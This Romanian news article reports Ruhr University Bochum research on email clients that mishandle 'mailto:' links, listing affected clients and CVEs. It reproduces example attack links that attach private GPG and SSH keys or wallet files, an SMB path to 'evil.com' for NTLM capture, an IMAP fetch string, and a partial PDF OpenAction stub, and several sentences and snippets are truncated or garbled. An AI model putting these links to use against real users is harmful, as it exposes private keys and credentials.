Cercetătorii de la Universitatea Ruhr din Bochum (Germania) () comportamentul clienților de email în procesarea linkurilor «mailto:» cu parametri extinși. Cinci din cele douăzeci de clienți de email analizați s-au dovedit a fi vulnerabili la un atac care manipulează substituția resurselor prin intermediul parametrului «attach». Încă șase clienți de email au fost expuși unui atac prin înlocuirea cheilor PGP și S/MIME, iar trei clienți s-au dovedit vulnerabili la un atac de extragere a conținutului mesajelor criptate.
Linkurile «» sunt folosite pentru a automatiza deschiderea clientului de email cu scopul de a scrie un mesaj adresat destinatarului specificat în link. Pe lângă adresă, linkul poate include parametri suplimentari, cum ar fi subiectul mesajului și un model de conținut standard. Atacul propus manipulatează parametrul «attach», care permite atașarea unui fișier la mesajul creat.
Clienții de email Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) și Pegasus Mail au fost vulnerabili la un atac simplu care permite atașarea automată a oricărui fișier local specificat printr-un link de tipul «mailto:?attach=cale_catre_fisier». Fișierul este atașat fără a afișa un avertisment, astfel că utilizatorul poate să nu observe că mesajul va fi trimis cu un fișier atașat.
De exemplu, prin intermediul unui link de tipul «mailto:?to=user@example.com&subject=Titlu&body=Text&attach=~/.gnupg/secring.gpg» se pot include cheile private de la GnuPG în mesaj. De asemenea, se pot trimite conținutul portofelelor criptografice (~/.bitcoin/wallet.dat), cheile SSH (~/.ssh/id_rsa) și orice fișiere accesibile utilizatorului. Mai mult, Thunderbird permite atașarea grupurilor de fișiere folosind mask-uri prin structuri de tipul «attach=/tmp/*.txt».
Pe lângă fișierele locale, unii clienți de email prelucrează linkuri către stocări de rețea și căi pe servere IMAP. În special, IBM Notes permite transferul unui fișier dintr-un director de rețea procesând linkuri de tipul «attach=\\evil.com\dummyfile», precum și interceptarea parametrilor de autentificare NTLM trimițând un link către un server SMB controlat de atacator (cererea va fi trimisă cu parametrii curenți de autentificare ai utilizatorului).
Thunderbird gestionează cu succes cererile de tip „attach=imap://fetch>UID>/INBOX>1/”, permițând atașarea conținutului din folderele de pe serverul IMAP. În acest proces, mesajele extrase din IMAP, criptate cu OpenPGP și S/MIME, sunt decriptate automat de clientul de email înainte de a fi trimise. Dezvoltatorii Thunderbird au fost informați despre problemă în februarie și în versiunea problema a fost deja rezolvată (versiunile Thunderbird 52, 60 și 68 rămân vulnerabile).
Versiunile mai vechi ale Thunderbird s-au dovedit a fi vulnerabile și la alte două tipuri de atacuri asupra PGP și S/MIME, propuse de cercetători. În special, atacul de înlocuire a cheițelor s-a aplicat atât pentru Thunderbird, cât și pentru OutLook, PostBox, eM Client, MailMate și R2Mail2, deoarece clientul de email importă și instalează automat certificatele noi transmise în mesajele S/MIME, permițând atacatorului să substituie cheile publice deja salvate de utilizator.
Al doilea atac, la care sunt expuse Thunderbird, PostBox și MailMate, manipulează caracteristicile mecanismului de salvare automată a schițelor mesajelor și permite, prin intermediul parametrelor mailto, inițierea decriptării mesajelor criptate sau adăugarea unei semnături digitale pentru mesaje arbitrare, cu transmiterea ulterioară a rezultatului către serverul IMAP al atacatorului. Cifratul este transmis prin parametrul „body”, iar pentru inițierea apelului către serverul IMAP al atacatorului se folosește eticheta „meta refresh”. De exemplu: ‘<meta http-equiv=
Pentru procesarea automată a legăturilor „mailto:” fără intervenția utilizatorului pot fi utilizate documente PDF special concepute — acțiunea OpenAction în PDF permite lansarea automată a manipulantului mailto la deschiderea documentului:
%PDF-1.5
1 0 obj
<>
endobj
2 0 obj
<>
endobj
Sursa: opennet.ro
